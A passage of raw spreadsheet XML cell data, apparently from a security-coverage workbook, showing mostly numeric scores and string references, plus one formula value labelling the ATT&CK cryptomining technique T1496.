      <c r="SX60" s="184"/>
      <c r="SY60" s="184"/>
      <c r="SZ60" s="184"/>
      <c r="TA60" s="184"/>
      <c r="TB60" s="184"/>
      <c r="TC60" s="184"/>
      <c r="TD60" s="184"/>
      <c r="TE60" s="184"/>
      <c r="TF60" s="184"/>
      <c r="TG60" s="184"/>
      <c r="TH60" s="184"/>
      <c r="TI60" s="184"/>
      <c r="TJ60" s="184"/>
      <c r="TK60" s="184"/>
      <c r="TL60" s="184"/>
      <c r="TM60" s="184"/>
      <c r="TN60" s="184"/>
      <c r="TO60" s="184"/>
      <c r="TP60" s="184"/>
      <c r="TQ60" s="184"/>
      <c r="TR60" s="184"/>
      <c r="TS60" s="184"/>
      <c r="TT60" s="184"/>
      <c r="TU60" s="184"/>
      <c r="TV60" s="184"/>
      <c r="TW60" s="184"/>
      <c r="TX60" s="184"/>
      <c r="TY60" s="184"/>
      <c r="TZ60" s="184"/>
      <c r="UA60" s="184"/>
      <c r="UB60" s="184"/>
      <c r="UC60" s="184"/>
      <c r="UD60" s="184"/>
      <c r="UE60" s="184"/>
      <c r="UF60" s="184"/>
      <c r="UG60" s="184"/>
      <c r="UH60" s="184"/>
      <c r="UI60" s="184"/>
      <c r="UJ60" s="184"/>
      <c r="UK60" s="184"/>
      <c r="UL60" s="184"/>
      <c r="UM60" s="184"/>
      <c r="UN60" s="184"/>
      <c r="UO60" s="184"/>
      <c r="UP60" s="184"/>
      <c r="UQ60" s="184"/>
      <c r="UR60" s="184"/>
      <c r="US60" s="184"/>
      <c r="UT60" s="184"/>
      <c r="UU60" s="184"/>
      <c r="UV60" s="184"/>
      <c r="UW60" s="184"/>
      <c r="UX60" s="184"/>
      <c r="UY60" s="184"/>
      <c r="UZ60" s="184"/>
      <c r="VA60" s="184"/>
      <c r="VB60" s="184"/>
      <c r="VC60" s="184"/>
      <c r="VD60" s="184"/>
      <c r="VE60" s="184"/>
      <c r="VF60" s="184"/>
      <c r="VG60" s="184"/>
      <c r="VH60" s="184"/>
      <c r="VI60" s="184"/>
      <c r="VJ60" s="184"/>
      <c r="VK60" s="184"/>
      <c r="VL60" s="184"/>
      <c r="VM60" s="184"/>
      <c r="VN60" s="184"/>
      <c r="VO60" s="184"/>
      <c r="VP60" s="184"/>
      <c r="VQ60" s="184"/>
      <c r="VR60" s="184"/>
      <c r="VS60" s="184"/>
      <c r="VT60" s="184"/>
      <c r="VU60" s="184"/>
      <c r="VV60" s="184"/>
      <c r="VW60" s="184"/>
      <c r="VX60" s="184"/>
      <c r="VY60" s="184"/>
    </row>
    <row r="61" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A61" s="82" t="s">
        <v>107</v>
      </c>
      <c r="B61" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C61" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D61" s="83" t="s">
        <v>110</v>
      </c>
      <c r="E61" s="83">
        <f t="shared" si="2"/>
        <v>46</v>
      </c>
      <c r="F61" s="83" t="s">
        <v>111</v>
      </c>
      <c r="G61" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H61" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I61" s="81" t="s">
        <v>1294</v>
      </c>
      <c r="J61" s="85" t="s">
        <v>4</v>
      </c>
      <c r="K61" s="81" t="s">
        <v>1295</v>
      </c>
      <c r="L61" s="81" t="s">
        <v>1296</v>
      </c>
      <c r="M61" s="378" t="s">
        <v>231</v>
      </c>
      <c r="N61" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O61" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P61" s="91"/>
      <c r="Q61" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R61" s="92" t="s">
        <v>1297</v>
      </c>
      <c r="S61" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T61" s="92" t="s">
        <v>1298</v>
      </c>
      <c r="U61" s="199" t="s">
        <v>1299</v>
      </c>
      <c r="V61" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W61" s="96" t="s">
        <v>1300</v>
      </c>
      <c r="X61" s="97" t="s">
        <v>1301</v>
      </c>
      <c r="Y61" s="83" t="s">
        <v>1302</v>
      </c>
      <c r="Z61" s="98" t="s">
        <v>1303</v>
      </c>
      <c r="AA61" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB61" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC61" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD61" s="83"/>
      <c r="AE61" s="83"/>
      <c r="AF61" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG61" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH61" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI61" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ61" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK61" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL61" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM61" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN61" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO61" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP61" s="385" t="str">
        <f>M61&amp;"-frag"</f>
        <v>T1496-Cryptomining-frag</v>
      </c>
      <c r="AQ61" s="646">
        <v>12</v>
      </c>
      <c r="AR61" s="100"/>
      <c r="AS61" s="100">
        <v>1</v>
      </c>
      <c r="AT61" s="100">
        <v>0</v>
      </c>
      <c r="AU61" s="100">
        <v>1</v>
      </c>
      <c r="AV61" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW61" s="100">
        <v>1</v>
      </c>
      <c r="AX61" s="100">
        <v>1</v>
      </c>
      <c r="AY61" s="100">
        <v>0</v>
      </c>
      <c r="AZ61" s="100">
        <v>1</v>
      </c>
      <c r="BA61" s="381" t="s">
        <v>4889</v>
      </c>
      <c r="BB61" s="101">
        <v>6</v>
      </c>
      <c r="BC61" s="102" t="s">
        <v>1816</v>
      </c>
      <c r="BD61" s="102">
        <v>6</v>
      </c>
      <c r="BE61" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="BF61" s="103">
        <v>3</v>
      </c>
      <c r="BG61" s="104">
        <v>2</v>
      </c>
      <c r="BH61" s="105">
        <v>0</v>
      </c>
      <c r="BI61" s="106">
        <v>0</v>
      </c>
      <c r="BJ61" s="497">
        <v>0</v>
      </c>
      <c r="BK61" s="107">
        <v>0</v>
      </c>
      <c r="BL61" s="107">
        <v>0</v>
      </c>
      <c r="BM61" s="108">
        <v>0</v>
      </c>
      <c r="BN61" s="109">
        <v>6</v>
      </c>
      <c r="BO61" s="110" t="s">
        <v>1816</v>
      </c>
      <c r="BP61" s="501">
        <v>6</v>
      </c>
      <c r="BQ61" s="111" t="s">
        <v>1788</v>
      </c>
      <c r="BR61" s="111">
        <v>3</v>
      </c>
      <c r="BS61" s="112">
        <v>2</v>
      </c>
      <c r="BT61" s="113">
        <v>8</v>
      </c>
      <c r="BU61" s="114" t="s">
        <v>3411</v>
      </c>
      <c r="BV61" s="503">
        <v>8</v>
      </c>
      <c r="BW61" s="115" t="s">
        <v>3412</v>
      </c>
      <c r="BX61" s="115">
        <v>4</v>
      </c>
      <c r="BY61" s="116">
        <v>4</v>
      </c>
      <c r="BZ61" s="250">
        <v>6</v>
      </c>
      <c r="CA61" s="251" t="s">
        <v>3413</v>
      </c>
      <c r="CB61" s="505">
        <v>4</v>
      </c>
      <c r="CC61" s="252" t="s">
        <v>2557</v>
      </c>
      <c r="CD61" s="252">
        <v>2</v>
      </c>
      <c r="CE61" s="253">
        <v>3</v>
      </c>
      <c r="CF61" s="101">
        <v>14</v>
      </c>
      <c r="CG61" s="102" t="s">
        <v>3414</v>
      </c>
      <c r="CH61" s="102">
        <v>12</v>
      </c>
      <c r="CI61" s="103" t="s">
        <v>3415</v>
      </c>
      <c r="CJ61" s="103">
        <v>6</v>
      </c>
      <c r="CK61" s="104">
        <v>4</v>
      </c>
      <c r="CL61" s="105">
        <v>0</v>
      </c>
      <c r="CM61" s="106">
        <v>0</v>
      </c>
      <c r="CN61" s="497">
        <v>0</v>
      </c>
      <c r="CO61" s="107">
        <v>0</v>
      </c>
      <c r="CP61" s="107">
        <v>0</v>
      </c>
      <c r="CQ61" s="108">
        <v>0</v>
      </c>
      <c r="CR61" s="109">
        <v>2</v>
      </c>
      <c r="CS61" s="110" t="s">
        <v>1948</v>
      </c>
      <c r="CT61" s="501">
        <v>2</v>
      </c>
      <c r="CU61" s="111" t="s">
        <v>1947</v>
      </c>
      <c r="CV61" s="111">
        <v>1</v>
      </c>
      <c r="CW61" s="112">
        <v>2</v>
      </c>
      <c r="CX61" s="113">
        <v>8</v>
      </c>
      <c r="CY61" s="114" t="s">
        <v>2169</v>
      </c>
      <c r="CZ61" s="503">
        <v>8</v>
      </c>
      <c r="DA61" s="115" t="s">
        <v>2170</v>
      </c>
      <c r="DB61" s="115">
        <v>4</v>
      </c>
      <c r="DC61" s="116">
        <v>4</v>
      </c>
      <c r="DD61" s="101">
        <v>0</v>
      </c>
      <c r="DE61" s="102">
        <v>0</v>
      </c>
      <c r="DF61" s="102">
        <v>0</v>
      </c>
      <c r="DG61" s="103">
        <v>0</v>
      </c>
      <c r="DH61" s="103">
        <v>0</v>
      </c>
      <c r="DI61" s="104">
        <v>0</v>
      </c>
      <c r="DJ61" s="105">
        <v>0</v>
      </c>
      <c r="DK61" s="106">
        <v>0</v>
      </c>
      <c r="DL61" s="497">
        <v>0</v>
      </c>
      <c r="DM61" s="107">
        <v>0</v>
      </c>
      <c r="DN61" s="107">
        <v>0</v>
      </c>
      <c r="DO61" s="108">
        <v>0</v>
      </c>
      <c r="DP61" s="109">
        <v>0</v>
      </c>
      <c r="DQ61" s="110">
        <v>0</v>
      </c>
      <c r="DR61" s="501">
        <v>0</v>
      </c>
      <c r="DS61" s="111">
        <v>0</v>
      </c>
      <c r="DT61" s="111">
        <v>0</v>
      </c>
      <c r="DU61" s="112">
        <v>0</v>
      </c>
      <c r="DV61" s="113">
        <v>0</v>
      </c>
      <c r="DW61" s="114">
        <v>0</v>
      </c>
      <c r="DX61" s="503">
        <v>0</v>
      </c>
      <c r="DY61" s="115">
        <v>0</v>
      </c>
      <c r="DZ61" s="115">
        <v>0</v>
      </c>
      <c r="EA61" s="116">
        <v>0</v>
      </c>
      <c r="EB61" s="250">
        <v>0</v>
      </c>
      <c r="EC61" s="251">
        <v>0</v>
      </c>
      <c r="ED61" s="505">
        <v>0</v>
      </c>
      <c r="EE61" s="252">
        <v>0</v>
      </c>
      <c r="EF61" s="252">
        <v>0</v>
      </c>
      <c r="EG61" s="253">
        <v>0</v>
      </c>
      <c r="EH61" s="101">
        <v>0</v>
      </c>
      <c r="EI61" s="102">
        <v>0</v>
      </c>
      <c r="EJ61" s="102">
        <v>0</v>
      </c>
      <c r="EK61" s="103">
        <v>0</v>
      </c>
      <c r="EL61" s="103">
        <v>0</v>
      </c>
      <c r="EM61" s="104">
        <v>0</v>
      </c>
      <c r="EN61" s="105">
        <v>0</v>
      </c>
      <c r="EO61" s="106">
        <v>0</v>
      </c>
      <c r="EP61" s="497">
        <v>0</v>
      </c>
      <c r="EQ61" s="107">
        <v>0</v>
      </c>
      <c r="ER61" s="107">
        <v>0</v>
      </c>
      <c r="ES61" s="108">
        <v>0</v>
      </c>
      <c r="ET61" s="109">
        <v>0</v>
      </c>
      <c r="EU61" s="110">
        <v>0</v>
      </c>
      <c r="EV61" s="501">
        <v>0</v>
      </c>
      <c r="EW61" s="111">
        <v>0</v>
      </c>
      <c r="EX61" s="111">
        <v>0</v>
      </c>
      <c r="EY61" s="112">
        <v>0</v>
      </c>
      <c r="EZ61" s="113">
        <v>0</v>
      </c>
      <c r="FA61" s="114">
        <v>0</v>
      </c>
      <c r="FB61" s="503">
        <v>0</v>
      </c>
      <c r="FC61" s="115">
        <v>0</v>
      </c>
      <c r="FD61" s="115">
        <v>0</v>
      </c>
      <c r="FE61" s="116">
        <v>0</v>
      </c>
      <c r="FF61" s="101">
        <v>0</v>
      </c>
      <c r="FG61" s="102">
        <v>0</v>
      </c>
      <c r="FH61" s="102">
        <v>0</v>
      </c>
      <c r="FI61" s="103">
        <v>0</v>
      </c>
      <c r="FJ61" s="103">
        <v>0</v>
      </c>
      <c r="FK61" s="104">
        <v>0</v>
      </c>
      <c r="FL61" s="105">
        <v>0</v>
      </c>
      <c r="FM61" s="106">
        <v>0</v>
      </c>
      <c r="FN61" s="497">
        <v>0</v>
      </c>
      <c r="FO61" s="107">
        <v>0</v>
      </c>
      <c r="FP61" s="107">
        <v>0</v>
      </c>
      <c r="FQ61" s="108">
        <v>0</v>
      </c>
      <c r="FR61" s="109">
        <v>0</v>
      </c>
      <c r="FS61" s="110">
        <v>0</v>
      </c>
      <c r="FT61" s="501">
        <v>0</v>
      </c>
      <c r="FU61" s="111">
        <v>0</v>
      </c>
      <c r="FV61" s="111">
        <v>0</v>
      </c>
      <c r="FW61" s="112">
        <v>0</v>
      </c>
      <c r="FX61" s="113">
        <v>2</v>
      </c>
      <c r="FY61" s="114" t="s">
        <v>1948</v>
      </c>
      <c r="FZ61" s="503">
        <v>2</v>
      </c>
      <c r="GA61" s="115" t="s">
        <v>1947</v>
      </c>
      <c r="GB61" s="115">
        <v>1</v>
      </c>
      <c r="GC61" s="116">
        <v>2</v>
      </c>
      <c r="GD61" s="250">
        <v>6</v>
      </c>
      <c r="GE61" s="251" t="s">
        <v>3413</v>
      </c>
      <c r="GF61" s="505">
        <v>4</v>
      </c>
      <c r="GG61" s="252" t="s">
        <v>2557</v>
      </c>
      <c r="GH61" s="252">
        <v>2</v>
      </c>
      <c r="GI61" s="253">
        <v>3</v>
      </c>
      <c r="GJ61" s="101">
        <v>8</v>
      </c>
      <c r="GK61" s="102" t="s">
        <v>3416</v>
      </c>
      <c r="GL61" s="102">
        <v>6</v>
      </c>
      <c r="GM61" s="103" t="s">
        <v>3417</v>
      </c>
      <c r="GN61" s="103">
        <v>3</v>
      </c>
      <c r="GO61" s="104">
        <v>4</v>
      </c>
      <c r="GP61" s="105">
        <v>0</v>
      </c>
      <c r="GQ61" s="106">
        <v>0</v>
      </c>
      <c r="GR61" s="497">
        <v>0</v>
      </c>
      <c r="GS61" s="107">
        <v>0</v>
      </c>
      <c r="GT61" s="107">
        <v>0</v>
      </c>
      <c r="GU61" s="108">
        <v>0</v>
      </c>
      <c r="GV61" s="109">
        <v>2</v>
      </c>
      <c r="GW61" s="110" t="s">
        <v>1948</v>
      </c>
      <c r="GX61" s="501">
        <v>2</v>
      </c>
      <c r="GY61" s="111" t="s">
        <v>1947</v>
      </c>
      <c r="GZ61" s="111">
        <v>1</v>
      </c>
      <c r="HA61" s="112">
        <v>2</v>
      </c>
      <c r="HB61" s="113">
        <v>2</v>
      </c>
      <c r="HC61" s="114" t="s">
        <v>1948</v>
      </c>
      <c r="HD61" s="503">
        <v>2</v>
      </c>
      <c r="HE61" s="115" t="s">
        <v>1947</v>
      </c>
      <c r="HF61" s="115">
        <v>1</v>
      </c>
      <c r="HG61" s="116">
        <v>2</v>
      </c>
      <c r="HH61" s="101">
        <v>6</v>
      </c>
      <c r="HI61" s="102" t="s">
        <v>1816</v>
      </c>
      <c r="HJ61" s="102">
        <v>6</v>
      </c>
      <c r="HK61" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="HL61" s="103">
        <v>3</v>
      </c>
      <c r="HM61" s="104">
        <v>2</v>
      </c>
      <c r="HN61" s="105">
        <v>0</v>
      </c>
      <c r="HO61" s="106">
        <v>0</v>
      </c>
      <c r="HP61" s="497">
        <v>0</v>
      </c>
      <c r="HQ61" s="107">
        <v>0</v>
      </c>
      <c r="HR61" s="107">
        <v>0</v>
      </c>
      <c r="HS61" s="108">
        <v>0</v>
      </c>
      <c r="HT61" s="109">
        <v>6</v>
      </c>
      <c r="HU61" s="110" t="s">
        <v>1816</v>
      </c>
      <c r="HV61" s="501">
        <v>6</v>
      </c>
      <c r="HW61" s="111" t="s">
        <v>1788</v>
      </c>
      <c r="HX61" s="111">
        <v>3</v>
      </c>
      <c r="HY61" s="112">
        <v>2</v>
      </c>
      <c r="HZ61" s="113">
        <v>6</v>
      </c>
      <c r="IA61" s="114" t="s">
        <v>1816</v>
      </c>
      <c r="IB61" s="503">
        <v>6</v>
      </c>
      <c r="IC61" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="ID61" s="115">
        <v>3</v>
      </c>
      <c r="IE61" s="116">
        <v>2</v>
      </c>
      <c r="IF61" s="250">
        <v>0</v>
      </c>
      <c r="IG61" s="251">
        <v>0</v>
      </c>
      <c r="IH61" s="505">
        <v>0</v>
      </c>
      <c r="II61" s="252">
        <v>0</v>
      </c>
      <c r="IJ61" s="252">
        <v>0</v>
      </c>
      <c r="IK61" s="253">
        <v>0</v>
      </c>
      <c r="IL61" s="101">
        <v>6</v>
      </c>
      <c r="IM61" s="102" t="s">
        <v>1816</v>
      </c>
      <c r="IN61" s="102">
        <v>6</v>
      </c>
      <c r="IO61" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="IP61" s="103">
        <v>3</v>
      </c>
      <c r="IQ61" s="104">
        <v>2</v>
      </c>
      <c r="IR61" s="105">
        <v>0</v>
      </c>
      <c r="IS61" s="106">
        <v>0</v>
      </c>
      <c r="IT61" s="497">
        <v>0</v>
      </c>
      <c r="IU61" s="107">
        <v>0</v>
      </c>
      <c r="IV61" s="107">
        <v>0</v>
      </c>
      <c r="IW61" s="108">
        <v>0</v>
      </c>
      <c r="IX61" s="109">
        <v>0</v>
      </c>
      <c r="IY61" s="110">
        <v>0</v>
      </c>
      <c r="IZ61" s="501">
        <v>0</v>
      </c>
      <c r="JA61" s="111">
        <v>0</v>
      </c>
      <c r="JB61" s="111">
        <v>0</v>
      </c>
      <c r="JC61" s="112">
        <v>0</v>
      </c>
      <c r="JD61" s="113">
        <v>6</v>
      </c>
      <c r="JE61" s="114" t="s">
        <v>1816</v>
      </c>
      <c r="JF61" s="503">
        <v>6</v>
      </c>
      <c r="JG61" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="JH61" s="115">
        <v>3</v>
      </c>
      <c r="JI61" s="116">
        <v>2</v>
      </c>
      <c r="JJ61" s="101">
        <v>0</v>
      </c>
      <c r="JK61" s="102">
        <v>0</v>
      </c>
      <c r="JL61" s="102">
        <v>0</v>
      </c>
      <c r="JM61" s="103">
        <v>0</v>
      </c>
      <c r="JN61" s="103">
        <v>0</v>
      </c>
      <c r="JO61" s="104">
        <v>0</v>
      </c>
      <c r="JP61" s="105">
        <v>0</v>
      </c>
      <c r="JQ61" s="106">
        <v>0</v>
      </c>
      <c r="JR61" s="497">
        <v>0</v>
      </c>
      <c r="JS61" s="107">
        <v>0</v>
      </c>
      <c r="JT61" s="107">
        <v>0</v>
      </c>
      <c r="JU61" s="108">
        <v>0</v>
      </c>
      <c r="JV61" s="109">
        <v>0</v>
      </c>
      <c r="JW61" s="110">
        <v>0</v>
      </c>
      <c r="JX61" s="501">
        <v>0</v>
      </c>
      <c r="JY61" s="111">
        <v>0</v>
      </c>
      <c r="JZ61" s="111">
        <v>0</v>
      </c>
      <c r="KA61" s="112">
        <v>0</v>
      </c>
      <c r="KB61" s="113">
        <v>0</v>
      </c>
      <c r="KC61" s="114">
        <v>0</v>
      </c>
      <c r="KD61" s="503">
        <v>0</v>
      </c>
      <c r="KE61" s="115">
        <v>0</v>
      </c>
      <c r="KF61" s="115">
        <v>0</v>
      </c>
      <c r="KG61" s="116">
        <v>0</v>
      </c>
      <c r="KH61" s="250">
        <v>0</v>
      </c>
      <c r="KI61" s="251">
        <v>0</v>
      </c>
      <c r="KJ61" s="505">
        <v>0</v>
      </c>
      <c r="KK61" s="252">
        <v>0</v>
      </c>
      <c r="KL61" s="252">
        <v>0</v>
      </c>
      <c r="KM61" s="253">
        <v>0</v>
      </c>
      <c r="KN61" s="101">
        <v>0</v>
      </c>
      <c r="KO61" s="102">
        <v>0</v>
      </c>
      <c r="KP61" s="102">
        <v>0</v>
      </c>
      <c r="KQ61" s="103">
        <v>0</v>
      </c>
      <c r="KR61" s="103">
        <v>0</v>
      </c>
      <c r="KS61" s="104">
        <v>0</v>
      </c>
      <c r="KT61" s="105">
        <v>0</v>
      </c>
      <c r="KU61" s="106">
        <v>0</v>
      </c>
      <c r="KV61" s="497">
        <v>0</v>
      </c>
      <c r="KW61" s="107">
        <v>0</v>
      </c>
      <c r="KX61" s="107">
        <v>0</v>
      </c>
      <c r="KY61" s="108">
        <v>0</v>
      </c>
      <c r="KZ61" s="109">
        <v>0</v>
      </c>
      <c r="LA61" s="110">
        <v>0</v>
      </c>
      <c r="LB61" s="501">
        <v>0</v>
      </c>
      <c r="LC61" s="111">
        <v>0</v>
      </c>
      <c r="LD61" s="111">
        <v>0</v>
      </c>
      <c r="LE61" s="112">
        <v>0</v>
      </c>
      <c r="LF61" s="113">
        <v>0</v>
      </c>
      <c r="LG61" s="114">
        <v>0</v>
      </c>
      <c r="LH61" s="503">
        <v>0</v>
      </c>
      <c r="LI61" s="115">
        <v>0</v>
      </c>
      <c r="LJ61" s="115">
        <v>0</v>
      </c>
      <c r="LK61" s="116">
        <v>0</v>
      </c>
      <c r="LL61" s="117">
        <v>13</v>
      </c>
      <c r="LM61" s="507">
        <v>10</v>
      </c>
      <c r="LN61" s="119">
        <v>0</v>
      </c>
      <c r="LO61" s="119">
        <v>5</v>
      </c>
      <c r="LP61" s="119">
        <v>10</v>
      </c>
      <c r="LQ61" s="119">
        <v>0</v>
      </c>
      <c r="LR61" s="119">
        <v>10</v>
      </c>
      <c r="LS61" s="119">
        <v>10</v>
      </c>
      <c r="LT61" s="382"/>
      <c r="LU61" s="117">
        <v>0</v>
      </c>
      <c r="LV61" s="118">
        <v>0</v>
      </c>
      <c r="LW61" s="507">
        <v>0</v>
      </c>
      <c r="LX61" s="119">
        <v>0</v>
      </c>
      <c r="LY61" s="119">
        <v>0</v>
      </c>
      <c r="LZ61" s="119">
        <v>0</v>
      </c>
      <c r="MA61" s="117">
        <v>0</v>
      </c>
      <c r="MB61" s="118">
        <v>0</v>
      </c>
      <c r="MC61" s="507">
        <v>0</v>
      </c>
      <c r="MD61" s="119">
        <v>0</v>
      </c>
      <c r="ME61" s="119">
        <v>0</v>
      </c>
      <c r="MF61" s="119">
        <v>0</v>
      </c>
      <c r="MG61" s="117">
        <v>0</v>
      </c>
      <c r="MH61" s="118">
        <v>0</v>
      </c>
      <c r="MI61" s="507">
        <v>0</v>
      </c>
      <c r="MJ61" s="119">
        <v>0</v>
      </c>
      <c r="MK61" s="119">
        <v>0</v>
      </c>
      <c r="ML61" s="119">
        <v>0</v>
      </c>
      <c r="MM61" s="117">
        <v>0</v>
      </c>
      <c r="MN61" s="118">
        <v>0</v>
      </c>
      <c r="MO61" s="507">
        <v>0</v>
      </c>
      <c r="MP61" s="119">
        <v>0</v>
      </c>
      <c r="MQ61" s="119">
        <v>0</v>
      </c>
      <c r="MR61" s="119">
        <v>0</v>
      </c>
      <c r="MS61" s="117">
        <v>0</v>
      </c>
      <c r="MT61" s="118">
        <v>0</v>
      </c>
      <c r="MU61" s="507">
        <v>0</v>
      </c>
      <c r="MV61" s="119">
        <v>0</v>
      </c>
      <c r="MW61" s="119">
        <v>0</v>
      </c>
      <c r="MX61" s="119">
        <v>0</v>
      </c>
      <c r="MY61" s="117">
        <v>0</v>
      </c>
      <c r="MZ61" s="118">
        <v>0</v>
      </c>
      <c r="NA61" s="507">
        <v>0</v>
      </c>
      <c r="NB61" s="119">
        <v>0</v>
      </c>
      <c r="NC61" s="119">
        <v>0</v>
      </c>
      <c r="ND61" s="119">
        <v>0</v>
      </c>
      <c r="NE61" s="117">
        <v>0</v>
      </c>
      <c r="NF61" s="118">
        <v>0</v>
      </c>
      <c r="NG61" s="507">
        <v>0</v>
      </c>
      <c r="NH61" s="119">
        <v>0</v>
      </c>
      <c r="NI61" s="119">
        <v>0</v>
      </c>
      <c r="NJ61" s="119">
        <v>0</v>
      </c>
      <c r="NK61" s="117">
        <v>2</v>
      </c>
      <c r="NL61" s="118" t="s">
        <v>4229</v>
      </c>
      <c r="NM61" s="507">
        <v>2</v>
      </c>
      <c r="NN61" s="119" t="s">
        <v>3334</v>
      </c>
      <c r="NO61" s="119">
        <v>1</v>
      </c>
      <c r="NP61" s="119">
        <v>2</v>
      </c>
      <c r="NQ61" s="117">
        <v>0</v>
      </c>
      <c r="NR61" s="118">
        <v>0</v>
      </c>
      <c r="NS61" s="507">
        <v>0</v>
      </c>
      <c r="NT61" s="119">
        <v>0</v>
      </c>
      <c r="NU61" s="119">
        <v>0</v>
      </c>
      <c r="NV61" s="119">
        <v>0</v>
      </c>
      <c r="NW61" s="117">
        <v>11</v>
      </c>
      <c r="NX61" s="118" t="s">
        <v>4382</v>
      </c>
      <c r="NY61" s="507">
        <v>8</v>
      </c>
      <c r="NZ61" s="119" t="s">
        <v>4383</v>
      </c>
      <c r="OA61" s="119">
        <v>4</v>
      </c>
      <c r="OB61" s="119">
        <v>8</v>
      </c>
      <c r="OC61" s="120">
        <v>4</v>
      </c>
      <c r="OD61" s="120">
        <v>4</v>
      </c>
      <c r="OE61" s="120">
        <v>2</v>
      </c>
      <c r="OF61" s="121">
        <v>3</v>
      </c>
      <c r="OG61" s="120">
        <v>4</v>
      </c>
      <c r="OH61" s="120">
        <v>4</v>
      </c>
      <c r="OI61" s="120">
        <v>4</v>
      </c>
      <c r="OJ61" s="120">
        <v>4</v>
      </c>
      <c r="OK61" s="383"/>
      <c r="OL61" s="120">
        <v>2</v>
      </c>
      <c r="OM61" s="120">
        <v>2</v>
      </c>
      <c r="ON61" s="120">
        <v>2</v>
      </c>
      <c r="OO61" s="120" t="s">
        <v>2844</v>
      </c>
      <c r="OP61" s="120">
        <v>1</v>
      </c>
      <c r="OQ61" s="464">
        <v>2</v>
      </c>
      <c r="OR61" s="120">
        <v>0</v>
      </c>
      <c r="OS61" s="120">
        <v>0</v>
      </c>
      <c r="OT61" s="120">
        <v>0</v>
      </c>
      <c r="OU61" s="120"/>
      <c r="OV61" s="120">
        <v>0</v>
      </c>
      <c r="OW61" s="464">
        <v>0</v>
      </c>
      <c r="OX61" s="120">
        <v>2</v>
      </c>
      <c r="OY61" s="120">
        <v>2</v>
      </c>
      <c r="OZ61" s="120">
        <v>2</v>
      </c>
      <c r="PA61" s="120" t="s">
        <v>3418</v>
      </c>
      <c r="PB61" s="120">
        <v>1</v>
      </c>
      <c r="PC61" s="464">
        <v>2</v>
      </c>
      <c r="PD61" s="120">
        <v>0</v>
      </c>
      <c r="PE61" s="120">
        <v>0</v>
      </c>
      <c r="PF61" s="120">
        <v>0</v>
      </c>
      <c r="PG61" s="120"/>
      <c r="PH61" s="120">
        <v>0</v>
      </c>
      <c r="PI61" s="464">
        <v>0</v>
      </c>
      <c r="PJ61" s="120">
        <v>0</v>
      </c>
      <c r="PK61" s="120">
        <v>0</v>
      </c>
      <c r="PL61" s="120">
        <v>0</v>
      </c>
      <c r="PM61" s="120"/>
      <c r="PN61" s="120">
        <v>0</v>
      </c>
      <c r="PO61" s="464">
        <v>0</v>
      </c>
      <c r="PP61" s="120">
        <v>0</v>
      </c>
      <c r="PQ61" s="120">
        <v>0</v>
      </c>
      <c r="PR61" s="120">
        <v>0</v>
      </c>
      <c r="PS61" s="120"/>
      <c r="PT61" s="120">
        <v>0</v>
      </c>
      <c r="PU61" s="464">
        <v>0</v>
      </c>
      <c r="PV61" s="120">
        <v>1</v>
      </c>
      <c r="PW61" s="120">
        <v>1</v>
      </c>
      <c r="PX61" s="120">
        <v>1</v>
      </c>
      <c r="PY61" s="120" t="s">
        <v>3419</v>
      </c>
      <c r="PZ61" s="120">
        <v>1</v>
      </c>
      <c r="QA61" s="464">
        <v>1</v>
      </c>
      <c r="QB61" s="120">
        <v>2</v>
      </c>
      <c r="QC61" s="120">
        <v>2</v>
      </c>
      <c r="QD61" s="120">
        <v>2</v>
      </c>
      <c r="QE61" s="120" t="s">
        <v>2563</v>
      </c>
      <c r="QF61" s="120">
        <v>1</v>
      </c>
      <c r="QG61" s="464">
        <v>2</v>
      </c>
      <c r="QH61" s="120">
        <v>1</v>
      </c>
      <c r="QI61" s="120">
        <v>1</v>
      </c>
      <c r="QJ61" s="120">
        <v>1</v>
      </c>
      <c r="QK61" s="120" t="s">
        <v>2508</v>
      </c>
      <c r="QL61" s="120">
        <v>1</v>
      </c>
      <c r="QM61" s="464">
        <v>1</v>
      </c>
      <c r="QN61" s="120">
        <v>0</v>
      </c>
      <c r="QO61" s="120">
        <v>0</v>
      </c>
      <c r="QP61" s="120">
        <v>0</v>
      </c>
      <c r="QQ61" s="120"/>
      <c r="QR61" s="120">
        <v>0</v>
      </c>
      <c r="QS61" s="464">
        <v>0</v>
      </c>
      <c r="QT61" s="184"/>
      <c r="QU61" s="184"/>
      <c r="QV61" s="184"/>
      <c r="QW61" s="184"/>
      <c r="QX61" s="184"/>
      <c r="QY61" s="184"/>
      <c r="QZ61" s="184"/>
      <c r="RA61" s="184"/>
      <c r="RB61" s="184"/>
      <c r="RC61" s="184"/>
      <c r="RD61" s="184"/>
      <c r="RE61" s="184"/>
      <c r="RF61" s="184"/>
      <c r="RG61" s="184"/>
      <c r="RH61" s="184"/>
      <c r="RI61" s="184"/>
      <c r="RJ61" s="184"/>
      <c r="RK61" s="184"/>
      <c r="RL61" s="184"/>
      <c r="RM61" s="184"/>
      <c r="RN61" s="184"/>
      <c r="RO61" s="184"/>
      <c r="RP61" s="184"/>
      <c r="RQ61" s="184"/>
      <c r="RR61" s="184"/>
